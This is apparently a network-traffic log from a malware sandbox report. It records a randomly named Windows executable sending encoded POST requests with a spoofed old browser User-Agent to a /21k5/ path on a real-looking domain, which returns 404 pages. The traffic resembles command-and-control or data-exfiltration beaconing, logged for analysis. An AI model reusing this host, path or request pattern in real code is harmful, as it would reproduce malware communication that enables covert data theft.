                                                                                  Nov 20, 2024 08:32:19.344187021 CET1236INData Raw: 34 2e 30 39 34 20 31 2e 37 38 2e 30 31 35 20 33 2e 32 2d 31 2e 37 37 36 20 33 2e 32 31 37 2d 34 2e 30 36 34 2e 30 31 37 2d 32 2e 32 38 38 2d 31 2e 33 37 36 2d 34 2e 30 37 39 2d 33 2e 31 37 32 2d 34 2e 30 39 34 7a 6d 32 36 2e 32 2e 31 32 63 2d 31
                                                                                  Data Ascii: 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.394 4.091 3.19 4.091s3.2-1.776 3.217-4.064c.017-2.288-1.391-4.091-3.187-4.091h-.003zm-29.1-2.182c-.701-.023-1.326-.45-1.6
                                                                                  Nov 20, 2024 08:32:19.344199896 CET1236INData Raw: 2e 31 32 35 2d 36 2e 33 30 36 2d 2e 30 31 36 2d 2e 34 38 31 2e 31 36 2d 2e 39 34 39 2e 34 38 39 2d 31 2e 33 2e 34 39 34 2d 2e 35 33 33 20 31 2e 32 36 34 2d 2e 37 31 20 31 2e 39 34 2d 2e 34 34 35 2e 36 37 37 2e 32 36 35 20 31 2e 31 32 32 2e 39 31
                                                                                  Data Ascii: .125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.122 1.645-.153 2.481-.842 4.9-2.02 7.089l1.586 2c.428.536.517 1.267.228 1.889-.289.622-.904 1.027-1.59 1.046l-.004-.004zm26.535 11.408l-17.284-.647c-.997-.03
                                                                                  Nov 20, 2024 08:32:19.348954916 CET1236INData Raw: 2e 38 30 31 2e 31 32 34 2d 31 2e 31 33 33 2e 33 35 36 2d 2e 36 38 33 2e 34 38 32 2d 31 2e 30 30 31 20 31 2e 33 33 33 2d 2e 38 20 32 2e 31 34 35 2e 30 32 33 2e 31 32 36 2e 30 35 36 2e 32 35 2e 31 2e 33 37 31 2e 33 31 32 2e 37 34 33 20 31 2e 30 34
                                                                                  Data Ascii: .801.124-1.133.356-.683.482-1.001 1.333-.8 2.145.023.126.056.25.1.371.312.743 1.041 1.224 1.846 1.218.805-.006 1.528-.497 1.829-1.244l.061-.2.029-.146c.201-.812-.116-1.664-.8-2.146-.332-.231-.727-.355-1.131-.354h-.001zm0-9.692c-.405-.001-.801.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.649991163.44.185.183803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:21.122011900 CET855OUTPOST /21k5/ HTTP/1.1
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/21k5/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 32 66 51 70 44 39 72 5a 4f 62 68 46 73 6f 4d 64 76 65 58 38 4a 6c 77 5a 67 34 48 52 49 74 6d 6f 35 63 4c 43 4c 37 45 64 2f 67 4e 6f 61 67 37 73 72 5a 36 51 4c 78 4a 70 43 36 52 63 46 36 4c 47 41 33 51 37 68 68 55 2f 58 65 76 34 41 67 34 6c 71 52 75 46 70 52 74 64 6a 75 4b 4b 57 75 71 52 53 79 63 6f 36 31 65 52 63 71 46 76 50 33 6a 59 63 6c 32 63 65 6f 6a 48 77 4d 55 39 56 32 44 50 4e 4f 62 63 38 61 34 65 39 59 6a 67 5a 39 4c 31 35 77 49 79 77 4f 35 57 44 4c 50 66 6e 32 7a 55 2f 76 45 7a 62 2f 50 59 5a 31 38 48 4b 37 55 37 65 68 65 6d 6d 6c 46 79 71 71 34 68 49 55 72 6e 34 65 49 37 70 5a 72 53 33 68 70 7a 76 64 65 4b 79 54 4d 73 4b 67 3d 3d
                                                                                  Data Ascii: GR54yHZ8=SUzGnuvHqjrd2fQpD9rZObhFsoMdveX8JlwZg4HRItmo5cLCL7Ed/gNoag7srZ6QLxJpC6RcF6LGA3Q7hhU/Xev4Ag4lqRuFpRtdjuKKWuqRSyco61eRcqFvP3jYcl2ceojHwMU9V2DPNObc8a4e9YjgZ9L15wIywO5WDLPfn2zU/vEzb/PYZ18HK7U7ehemmlFyqq4hIUrn4eI7pZrS3hpzvdeKyTMsKg==
                                                                                  Nov 20, 2024 08:32:21.919670105 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                  Nov 20, 2024 08:32:21.919878006 CET224INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                  Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center;
                                                                                  Nov 20, 2024 08:32:21.919886112 CET1236INData Raw: 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61
                                                                                  Data Ascii: -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap;
                                                                                  Nov 20, 2024 08:32:21.919893026 CET1236INData Raw: 3a 20 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72
                                                                                  Data Ascii: : middle; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                                                                  Nov 20, 2024 08:32:21.919899940 CET1236INData Raw: 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69
                                                                                  Data Ascii: } .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media s
                                                                                  Nov 20, 2024 08:32:21.919914961 CET1236INData Raw: 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66
                                                                                  Data Ascii: rg/2000/svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-3
                                                                                  Nov 20, 2024 08:32:21.919928074 CET1236INData Raw: 2e 35 31 34 2e 33 39 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20
                                                                                  Data Ascii: .514.396 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.5
                                                                                  Nov 20, 2024 08:32:21.920092106 CET552INData Raw: 2d 2e 33 37 33 2d 33 2e 36 32 31 2d 31 2e 36 37 31 2d 2e 38 32 34 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d
                                                                                  Data Ascii: -.373-3.621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.
                                                                                  Nov 20, 2024 08:32:21.921544075 CET1236INData Raw: 37 2d 2e 33 20 32 2e 39 33 35 2d 2e 32 38 32 20 31 2e 35 38 39 2d 2e 33 34 38 20 33 2e 32 30 39 2d 2e 31 39 35 20 34 2e 38 31 36 2d 33 2e 37 33 20 31 31 2e 32 32 37 2d 31 32 2e 35 37 34 20 31 39 2e 33 38 34 2d 32 32 2e 35 35 35 20 31 39 2e 33 38
                                                                                  Data Ascii: 7-.3 2.935-.282 1.589-.348 3.209-.195 4.816-3.73 11.227-12.574 19.384-22.555 19.384zm32.922-26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.00
                                                                                  Nov 20, 2024 08:32:21.921623945 CET1236INData Raw: 35 31 2d 31 2e 39 36 2e 39 35 39 2d 32 2e 33 34 39 20 32 2e 36 35 33 2d 31 2e 31 32 33 20 35 2e 37 31 39 2d 2e 35 38 31 20 37 2e 38 32 36 20 31 2e 33 38 35 2e 34 36 38 2e 35 32 33 2e 35 39 20 31 2e 32 37 2e 33 31 34 20 31 2e 39 31 35 2d 2e 32 37
                                                                                  Data Ascii: 51-1.96.959-2.349 2.653-1.123 5.719-.581 7.826 1.385.468.523.59 1.27.314 1.915-.276.645-.901 1.072-1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.
                                                                                  Nov 20, 2024 08:32:21.924953938 CET1236INData Raw: 2d 31 2e 31 2d 31 2e 32 38 36 6c 2d 2e 33 37 32 2d 2e 34 34 38 2d 2e 31 31 31 2d 2e 31 34 37 63 2d 2e 33 34 33 2d 2e 34 35 39 2d 2e 37 2d 2e 39 33 34 2d 31 2e 30 33 37 2d 31 2e 34 33 33 6c 2d 2e 31 35 38 2d 2e 32 33 38 63 2d 2e 33 37 32 2d 2e 35
                                                                                  Data Ascii: -1.1-1.286l-.372-.448-.111-.147c-.343-.459-.7-.934-1.037-1.433l-.158-.238c-.372-.537-.74-1.108-1.123-1.724l-.442-.736-.214-.365-.431-.748c-1.299-2.367-2.416-4.83-3.342-7.366-1.876-5.242-3.133-10.686-3.746-16.22l1.927-.47 2.274 5.9c.088.224.271


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.649992163.44.185.183803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:32:23.665066004 CET1868OUTPOST /21k5/ HTTP/1.1
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/21k5/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 32 66 51 70 44 39 72 5a 4f 62 68 46 73 6f 4d 64 76 65 58 38 4a 6c 77 5a 67 34 48 52 49 74 2b 6f 34 75 44 43 4a 59 73 64 77 41 4e 6f 5a 67 37 74 72 5a 37 56 4c 77 68 6c 43 36 63 2b 46 2b 37 47 41 56 49 37 70 77 55 2f 64 65 76 34 43 67 34 34 6b 78 75 55 70 53 56 5a 6a 75 61 4b 57 75 71 52 53 77 45 6f 34 6b 65 52 61 71 46 73 66 48 6a 4d 59 6c 32 34 65 6f 4c 58 77 4d 51 44 56 46 4c 50 4e 71 2f 63 77 4a 41 65 30 59 6a 69 59 39 4b 6d 35 77 56 69 77 4f 6c 73 44 4b 4c 31 6e 30 76 55 2f 72 56 4e 42 2b 58 48 47 57 6f 39 4c 36 6f 69 56 55 43 75 6d 55 77 4d 72 6f 73 71 46 46 58 56 77 76 6f 2f 6e 59 53 76 68 7a 52 46 73 61 48 46 34 43 56 48 53 6c 74 43 4d 78 30 55 54 64 61 4a 47 67 56 46 75 35 46 54 6c 77 55 66 76 4b 4b 42 4a 33 64 35 66 4b 46 78 37 4e 6e 32 34 74 74 4d 55 45 58 39 70 47 33 38 79 78 43 37 76 50 68 59 66 50 57 6f 48 4a 6c 78 30 46 32 79 48 49 5a 4f 46 36 64 57 4b 4b 54 6c 59 75 66 68 42 5a 59 6d 4e 47 47 34 6f 42 76 44 48 2b 6d 79 76 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=SUzGnuvHqjrd2fQpD9rZObhFsoMdveX8JlwZg4HRIt+o4uDCJYsdwANoZg7trZ7VLwhlC6c+F+7GAVI7pwU/dev4Cg44kxuUpSVZjuaKWuqRSwEo4keRaqFsfHjMYl24eoLXwMQDVFLPNq/cwJAe0YjiY9Km5wViwOlsDKL1n0vU/rVNB+XHGWo9L6oiVUCumUwMrosqFFXVwvo/nYSvhzRFsaHF4CVHSltCMx0UTdaJGgVFu5FTlwUfvKKBJ3d5fKFx7Nn24ttMUEX9pG38yxC7vPhYfPWoHJlx0F2yHIZOF6dWKKTlYufhBZYmNGG4oBvDH+myvLdsel7sNvsE0VSlgAjr9mcO9fUfm7hCYwJVh+aybPyqcApfNSD8NAYUVucMizPglyQOvCRvjK79/1m0Wm25s96ErinLxfJ9CGD6rANoHNwQutwNM46zEhr72VuTnC3rK0ujKm37eigTtI8+4e/Zwtw9IdXsMqmxwYr+GyppjMN/BXN0gZ0PmDLDeOSpcI9nytvIOHRno0nBZb4/ajb62Jp8FS45/MYtfcgr0KrjEhCIp3AuvAibqpiO/+OLBQkO7N98N/RwetXMh4E9QR4Lah52g3pryM0KCcQWkd/TorLZMWhhVbhDXo4VFPqldqFMlDikUxqBqT1MUeOqSae2L2qPHHTGtPmG9kJz1D3JUMtDFJemOkoCkE++arWBGXRWT0KU+aXeVsTpUrTLJr1xT3+nXgfaUm2CNTzziWEOVsJjxyu+0I0XCRENnuZeO6kIQidmxBayG/lZVOxgcNUzyTi4wfk7yZviKn1wS6gSU8pnc3T8X1pCxqvL7wXtDTniEScxviZ3MCbZt7uX+QXM4YoiwV7r+eYUusQM/5QiuVgLicjcIjVdcqTFtI+T//mJiOFs9vLZZCA3LQkk2irBIxUGd6RWensz/oLAEot4m+EJvFCSsgEi7e1eybWsM6QFmGpvbEn/wP+qyHEydq/ipz0+mLZGoQdfcot [TRUNCATED]
                                                                                  Nov 20, 2024 08:32:24.442312956 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:24 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                  Nov 20, 2024 08:32:24.442328930 CET231INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                  Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
                                                                                  Nov 20, 2024 08:32:24.442339897 CET1236INData Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74
                                                                                  Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
                                                                                  Nov 20, 2024 08:32:24.442435026 CET1236INData Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b
                                                                                  Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                                                                  Nov 20, 2024 08:32:24.442446947 CET1236INData Raw: 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78
                                                                                  Data Ascii: .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen a
                                                                                  Nov 20, 2024 08:32:24.442456961 CET1236INData Raw: 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66
                                                                                  Data Ascii: /svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 1
                                                                                  Nov 20, 2024 08:32:24.442467928 CET848INData Raw: 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20 31 2e 33 2d 36 2e 31
                                                                                  Data Ascii: 6 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.40
                                                                                  Nov 20, 2024 08:32:24.442667961 CET1236INData Raw: 30 34 2d 2e 30 30 31 20 32 2e 36 35 38 2e 35 38 31 20 35 2e 32 38 33 20 31 2e 37 30 36 20 37 2e 36 39 31 20 31 2e 32 34 37 20 32 2e 32 39 36 20 33 2e 37 30 36 20 33 2e 36 36 38 20 36 2e 33 31 35 20 33 2e 35 32 32 68 2e 36 34 33 63 2e 39 37 39 2d
                                                                                  Data Ascii: 04-.001 2.658.581 5.283 1.706 7.691 1.247 2.296 3.706 3.668 6.315 3.522h.643c.979-.032 1.941-.261 2.829-.673 4.489 11.438 14.1 19.566 24.976 19.566h.209c10.834 0 20.486-8.037 25.051-19.415.881.422 1.837.662 2.813.707h.733c2.576.142 5.006-1.201
                                                                                  Nov 20, 2024 08:32:24.442677975 CET224INData Raw: 39 63 31 2e 34 37 34 2d 2e 31 32 36 20 32 2e 38 35 36 2e 37 33 31 20 33 2e 34 20 32 2e 31 30 37 2e 35 37 20 32 2e 30 32 35 2e 37 32 32 20 34 2e 31 34 35 2e 34 34 36 20 36 2e 32 33 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22
                                                                                  Data Ascii: 9c1.474-.126 2.856.731 3.4 2.107.57 2.025.722 4.145.446 6.231z"/><path fill="#fff" d="M39.765 24.186c-7.462 5.259-11.816 13.887-11.613 23.014 0 16.42 10.954 30.357 24.063 30.4h.15c13.079 0 24.183-13.8 24.242-30.191.013-4.387
                                                                                  Nov 20, 2024 08:32:24.442694902 CET1236INData Raw: 2d 2e 38 33 36 2d 38 2e 37 33 34 2d 32 2e 35 2d 31 32 2e 37 39 33 2d 31 32 2e 32 32 35 2e 34 30 37 2d 32 36 2e 39 33 35 2d 32 2e 36 39 34 2d 33 34 2e 33 34 32 2d 31 30 2e 34 33 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64
                                                                                  Data Ascii: -.836-8.734-2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0
                                                                                  Nov 20, 2024 08:32:24.447444916 CET1236INData Raw: 34 2e 32 35 39 20 32 2e 33 39 34 2d 37 2e 32 35 34 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 35 32 2e 33 36 35 20 36 30 2e 37 31 34 63 2d 2e 35 34 38 2e 30 30 31 2d 31 2e 30 36 36 2d 2e 32 34 38 2d 31 2e 34 30 37
                                                                                  Data Ascii: 4.259 2.394-7.254"/><path fill="#f60" d="M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
